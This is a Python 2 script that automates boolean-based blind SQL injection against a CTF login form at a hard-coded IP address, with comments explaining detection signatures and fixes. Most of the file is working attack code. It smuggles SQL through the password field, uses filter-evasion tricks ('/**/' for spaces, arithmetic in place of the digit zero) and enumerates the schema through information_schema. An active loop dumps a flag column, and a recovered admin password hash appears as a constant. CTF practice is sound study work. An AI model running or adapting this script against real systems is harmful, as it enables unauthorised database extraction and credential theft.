#! /usr/bin/env python2
# Boolean-based blind SQL injection walkthrough for a CTF login form (MySQL).
#
# Every query below is a yes/no question smuggled through the login's
# password field; the answer is read from which substring the response
# body contains ('logged user' / 'User exist' versus anything else).  Data
# is recovered one length or one character at a time, so even a short
# value costs hundreds of sequential POSTs.
#
# Defender's view of what makes this both detectable and preventable:
#   * the response differs between "row matched" and "no row" -- that
#     difference is the oracle the whole script depends on.  Parameterised
#     queries remove the injection; uniform login responses (same body and
#     status for every failure) remove the oracle.
#   * the traffic is a burst of near-identical POSTs to a single endpoint
#     whose password parameter carries '/**/', 'information_schema',
#     'ascii(', 'mid(' and a trailing '#'.  Those tokens in a credential
#     field are a high-confidence WAF/IDS signature, and a rate limit on
#     failed logins slows the enumeration by orders of magnitude.
#
# Most stages are left commented out; only the final "Dump 1 row" loop is
# active and it runs at import time (module-level side effect).  The file
# is Python 2 only: print statements, xrange, the 'commands' module.
import requests as req, string, re, commands  # 'commands' is never used below (and is gone in Python 3)

# Values recovered by the earlier, now commented-out, stages.  They are kept
# as constants so later stages can hard-code the result instead of asking
# the server again.
db_len = 7
# db_name = 'loginv3'
db_name = ''  # reused as the accumulator for whatever the active stage extracts
admin_password_len = 60
table_in_db = 3
table_name_len_1 = 4
table_name_len_2 = 5
table_name = 'fl4g'
columns_in_table = 5
col_1_len = 2
col_2_len = 4
col_3_len = 8
col_4_len = 8
col_5_len = 4
col_1 = 'flag'
col_2 = 'name'
col_3 = 'username'
col_4 = 'password'
col_5 = 'admin'
total_rows = 1  # :|
id = '1'  # shadows the builtin id(); assigned but never read below
name = 'admin'
username = 'admin'
password = '$2y$10$KpEcR/n54ZlX1OeKiLKwY.AfWXSXjUzL.Fk0CVtzsfYpYizThN3Qq'  # bcrypt-style ('$2y$') hash recovered earlier; not referenced below
admin = '1'

# ASCII codes of every printable character, in string.printable order.  This
# is the candidate alphabet each character position is tested against.
custom_string_printable = [ord(i) for i in string.printable]


class pass_empty(object):
    """Unused placeholder class; nothing in this file references it."""
    pass


def encode_payload_with_space(payload):
    """Return *payload* with every space replaced by the MySQL comment '/**/'.

    The parser treats the empty comment as whitespace, so the query still
    parses while no literal space character is sent.  From the detection
    side that substitution is itself a reliable signature: '/**/' has no
    legitimate reason to appear in a credential field.  The 'if' guard is
    redundant (str.replace is a no-op when there is nothing to replace).
    """
    if ' ' in payload:
        payload = payload.replace(' ', '/**/')
    return payload


def send_dirty_payload(payload):
    """POST one injected password to the hard-coded login endpoint, return the raw body.

    The username is a single backslash and the password is the SQL
    fragment under test.  Presumably the backslash escapes the quote that
    closes the username literal server-side so that the password text is
    parsed as SQL -- the classic symptom of a query built by string
    concatenation -- but that is inferred from the payload shape, not
    visible here.  Callers only ever use the body as a boolean oracle via
    substring checks.  No timeout and no error handling: a hung or failed
    request stops the whole run.
    """
    resp = req.post('http://45.77.241.3/Loginv3/login.php', data={'username': '\\', 'pass': encode_payload_with_space(payload)}).content
    return resp


def len_with_expression(list):
    """Rewrite each value of *list* as a string whose text contains no '0' digit.

    Values whose decimal form has no '0' pass through unchanged (as
    strings).  Values containing a '0' become a small arithmetic expression
    with the same numeric value, e.g. '10' -> '11 - 1'; the SQL side
    evaluates the expression in the comparison, and the Python side gets
    the number back with eval().  Presumably this works around the target
    rejecting the character '0' -- not visible from this file.

    The three-digit case ('^\\d{3}$') uses a running counter `i` rather than
    the value itself:
      * `i` starts at 1 and advances only on three-digit values that
        contain a '0', so '99 + i' equals the value only while such values
        arrive consecutively from 100 upwards (100..110 in the
        string.printable alphabet).  After a gap the counter no longer
        tracks the value: 120 yields '99 + 12', which is 111, not 120.
      * when `i` itself would contain a '0' (i == 10) it is spelled
        '9 + 1' instead.
    Two-digit and one-digit values with a '0' take the '{v+1} - 1' form.

    The parameter name shadows the builtin `list`; the index `k` is unused.
    """
    length = []
    i = 1
    for k, v in enumerate(list):
        v = str(v)
        if '0' in v:
            if re.findall(r'^\d{3}$', v):
                if '10' in str(i):
                    length.append('{} + {}'.format(99, '9 + 1'))
                else:
                    length.append('{} + {}'.format(99, i))
                i += 1
            else:
                length.append('{} - 1'.format(str(int(v) + 1)))
            continue
        length.append(v)
    return length


# ---------------------------------------------------------------------------
# Stages below are kept commented out as a record of how each constant above
# was obtained.  Each one follows the same pattern: enumerate candidates,
# send one request per candidate, stop at the first response that contains
# the success substring.
# ---------------------------------------------------------------------------
"""
Check db length
"""
# for k, v in enumerate(len_with_expression(xrange(100))):
#     payload = 'or length(database())={}#'.format(v)
#     if 'logged user' in send_dirty_payload(payload):
#         print k, 'logged user'
#         print '{}\ndb len: {}'.format('-' * 20, k)
#         break
#     print k, 'incorrect'

"""
Get db name
"""
# for i in xrange(1, db_len + 1):
#     for k, v in enumerate(len_with_expression(custom_string_printable)):
#         payload = 'or ascii(mid(database(),{},1))={}#'.format(i, v)
#         if 'logged user' in send_dirty_payload(payload):
#             db_name += chr(eval(v))
#             print chr(eval(v)), 'logged user'
#             print '{}\ndb name: {}'.format('-' * 20, db_name)
#             break
#         # print payload
#         print chr(eval(v)), 'incorrect'

"""
Check admin's password length
"""
# for k, v in enumerate(len_with_expression(xrange(100))):
#     payload = 'or length((select password from users limit 1))={}#'.format(v)
#     if 'logged user' in send_dirty_payload(payload):
#         print k, 'logged user'
#         print '{}\nadmin\'s password len: {}'.format('-' * 20, k)
#         break
#     print k, 'incorrect'

"""
Get admin's password
"""
# list_admin_password_len = [i for i in xrange(1, admin_password_len + 1)]
# for i in len_with_expression(list_admin_password_len):
#     for k, v in enumerate(len_with_expression(custom_string_printable)):
#         payload = 'or ascii(mid((select password from users limit 1),{},1))={}#'.format(i, v)
#         if 'User exist' in send_dirty_payload(payload):
#             db_name += chr(eval(v))
#             print chr(eval(v)), send_dirty_payload(payload)
#             print '{}\nadmin\'s password: {}'.format('-' * 20, db_name)
#             break
#         # print payload
#         print v, chr(eval(v)), send_dirty_payload(payload)

"""
Count tables in db 'ctf'
"""
# for k, v in enumerate(len_with_expression(xrange(100))):
#     payload = 'or (select count(table_name) from information_schema.tables where table_schema=database())={}#'.format(v)
#     if 'logged user' in send_dirty_payload(payload):
#         print k, 'logged user'
#         print '{}\ntotal tables in \'ctf\': {}'.format('-' * 20, k)
#         break
#     print k, 'incorrect'

"""
Check table_name's length
"""
# for k, v in enumerate(len_with_expression(xrange(100))):
#     payload = 'or length((select table_name from information_schema.tables where table_schema=database() limit 1,1))={}#'.format(
#         v)
#     if 'logged user' in send_dirty_payload(payload):
#         print k, 'logged user'
#         print '{}\ntable_name\'s length: {}'.format('-' * 20, k)
#         break
#     # print payload
#     print k, 'incorrect'

"""
List table in db 'ctf' (fix)
#
"""
# list_table_name_1_len = [i for i in xrange(1, table_name_len_1 + 1)]
# for i in len_with_expression(list_table_name_1_len):
#     for k, v in enumerate(len_with_expression(custom_string_printable)):
#         payload = 'or ascii(mid((select table_name from information_schema.tables where table_schema=database() limit 1),{},1))={}#'.format(
#             i, v)
#         if 'logged user' in send_dirty_payload(payload):
#             db_name += chr(eval(v))
#             print chr(eval(v)), 'logged user'
#             print '{}\ntable_name: {}'.format('-' * 20, db_name)
#             break
#         # print payload
#         print chr(eval(v)), 'incorrect'

"""
Count columns in db 'ctf'
"""
# for k, v in enumerate(len_with_expression(xrange(1, 100))):
#     payload = 'or (select count(column_name) from information_schema.columns where table_schema=database() limit 1)={}#'.format(
#         v)
#     if 'logged user' in send_dirty_payload(payload):
#         print v, 'logged user'
#         print '{}\ntotal tables in \'ctf\': {}'.format('-' * 20, v)
#         break
#     print v, 'incorrect'

"""
Check column_name's length
"""
# list_columns_in_table = [i for i in xrange(1, table_name_len_1)]
# for k, v in enumerate(len_with_expression(xrange(1, 100 + 1))):
#     payload = 'or length((select * from (select column_name from information_schema.columns where table_schema=database() limit 1)x limit 1))={}#'.format(
#         v)
#     if 'logged user' in send_dirty_payload(payload):
#         print v, 'logged user'
#         print '{}\ncolumn {}\'s name length: {}'.format('-' * 20, k, v)
#         break
#     print v, 'incorrect'
# for i in len_with_expression(list_columns_in_table):
#     for k, v in enumerate(len_with_expression(xrange(1, 100 + 1))):
#         payload = 'or length((select column_name from information_schema.columns where table_schema=database() limit {},1))={}#'.format(
#             i, v)
#         if 'User exist' in send_dirty_payload(payload):
#             print v, 'logged user'
#             print '{}\ncolumn {}\'s name length: {}'.format('-' * 20, int(i) + 1, v)
#             break
#         # print payload
#         print v, 'incorrect'

"""
Get col name
"""
# for i in xrange(1, 100 + 1):
#     for k, v in enumerate(len_with_expression(custom_string_printable)):
#         payload = 'or ascii(mid((select column_name from information_schema.columns where table_schema=database() limit 1,1),{},1))={}#'.format(
#             i, v)
#         if 'logged user' in send_dirty_payload(payload):
#             db_name += chr(eval(v))
#             print chr(eval(v)), 'logged user'
#             print '{}\ncol name: {}'.format('-' * 20, db_name)
#             break
#         # print payload
#         print chr(eval(v)), 'incorrect'

"""
Count id rows
"""
# for k, v in enumerate(len_with_expression(xrange(1, 101))):
#     payload = 'or (select count(pass) from fl4g)={}#'.format(
#         v)
#     if 'logged user' in send_dirty_payload(payload):
#         print v, 'logged user'
#         print '{}\ntotal rows in \'users\': {}'.format('-' * 20, v)
#         break
#     print v, 'incorrect'

"""
Dump 1 row :|
"""
# Active stage.  Reads the 'flag' column of fl4g one character at a time for
# positions 2640..2699 (earlier positions were presumably dumped in previous
# runs -- the range is hard-coded).  For each position every printable ASCII
# code is tried in turn until the response contains 'logged user'; that
# character is appended to db_name (reused here as the flag buffer) and the
# partial result is printed.  One request per candidate, so up to
# len(custom_string_printable) requests per character, with no retry and no
# handling of a position that matches nothing (the outer loop just moves on).
for i in xrange(2640, 2700):  # position() mysql
    for k, v in enumerate(len_with_expression(custom_string_printable)):
        payload = 'or ascii(mid((select flag from fl4g),{},1))={}#'.format(
            i, v)
        if 'logged user' in send_dirty_payload(payload):
            # eval() runs only on strings this script generated itself
            # ('99 + 1', '11 - 1'), never on server output; an explicit
            # integer parse would still be the safer idiom.
            db_name += chr(eval(v))
            print chr(eval(v)), 'logged user'
            print '{}\nflag: {}'.format('-' * 20, db_name)
            break
        # print payload
        print chr(eval(v)), 'incorrect'

"""
dbg
"""
# Local sanity checks for len_with_expression; no network traffic.
# for k, v in enumerate(len_with_expression(custom_string_printable)):
#     print v, eval(v)
# test = [i for i in xrange(1, admin_password_len + 1)]
# print len_with_expression(test)